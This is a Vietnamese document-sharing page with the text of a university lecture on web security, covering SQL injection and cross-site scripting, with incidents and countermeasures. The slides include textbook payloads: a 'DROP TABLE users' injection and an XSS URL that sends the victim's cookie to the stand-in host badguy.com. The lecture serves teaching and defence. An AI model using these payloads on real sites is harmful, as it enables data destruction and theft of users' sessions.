intTypePromotion=1

Bài giảng Mật mã và ứng dụng: An toàn Web - Trần Đức Khánh

Chia sẻ: Minh Vũ | Ngày: | Loại File: PDF | Số trang:14

0
88
lượt xem
14
download

Bài giảng Mật mã và ứng dụng: An toàn Web - Trần Đức Khánh

Mô tả tài liệu
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

 Bài giảng "Mật mã và ứng dụng: An toàn Web " cung cấp cho người đọc các nội dung: Tấn công SQL injection, tấn công XSS. Hi vọng đây sẽ là một tài liệu hữu ích dành cho các bạn sinh viên Công nghệ thông tin dùng làm tài liệu học tập và nghiên cứu.

Chủ đề:
Lưu

Nội dung Text: Bài giảng Mật mã và ứng dụng: An toàn Web - Trần Đức Khánh

  1. An toàn Web Trần Đức Khánh Bộ môn HTTT – Viện CNTT&TT ĐH BKHN
  2. An toàn Web o  Tấn công SQL injection o  Tấn công XSS
  3. SQL injection o  SQL n  Structured Query Language n  Ngôn ngữ truy vấn CSDL
  4. SQL injection
  5. SQL injection o  Tấn công SQL Injection n  statement = “SELECT * FROM users WHERE name = ‘ “ + userName +” ‘;” Điều gì xảy ra nếu userName = hi’ or 1=1
  6. SQL injection
  7. SQL injection o  Tấn công SQL Injection n  statement = “SELECT * FROM users WHERE name = ‘ “ + userName +” ‘;” Điều gì xảy ra nếu userName = hi';DROP TABLE users;
  8. SQL injection o  06/2005 n  Tấn công hệ thống thẻ, 263000 thẻ bị đánh cắp, 43000000 thẻ gặp nguy cơ o  06/2007 n  Tấn công bôi xấu trang Microsoft UK o  08/2007 n  Tấn công bôi xấu trang LHQ o  01/2008 n  Hàng chục nghìn máy tính bị tấn công vào MS SQL Server
  9. SQL injection o  Biện pháp ngăn chặn n  Mức lập trình o  Kiểm soát chặt chẽ đầu vào o  Loại bỏ các ký tự đặc biệt n  Ở mức CSDL o  Dùng lệnh prepare để định dạng câu truy vấn n  Phân tích tĩnh câu truy vấn o  Phát hiện điều kiện “1 = 1” n  Kiểm thử
  10. Tấn công XSS o  Ví dụ n  Search: http://victim.com/search.php ? term = apple n  Search.php trả lời Search Results Results for : ... o  Có nguy cơ gì không?
  11. Tấn công XSS o  Vấn đề: không duyệt đầu vào “term” http://victim.com/search.php ? term = window.open( “http://badguy.com?cookie = ” + document.cookie ) o  Điều gì xảy ra nếu người dùng kích lên địa chỉ này n  Trình duyệt đi đến victim.com/search.php n  victim.com trả về Results for ... n  Trình duyệt gửi cookie của victim.com cho badguy.com
  12. Tấn công XSS
  13. Tấn công XSS o  Cách thức lừa người dùng kích vào liên kết độc hại n  Phishing email n  Banner quảng cáo n  ...
  14. Tấn công XSS o  Khai thác n  Đánh cắp cookie (người dùng, mật khẩu, đặc quyền,…) n  Thực thi các script trong trình duyệt như là từ trang của nạn nhân n  Lây nhiễm: sâu Samy trên mySpace.com o  Hậu quả n  80 % lỗ hổng an ninh mạng được báo cáo n  Mục tiêu lớn: google, facebook, mySpace, Yahoo, PayPal, eBay
ADSENSE
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2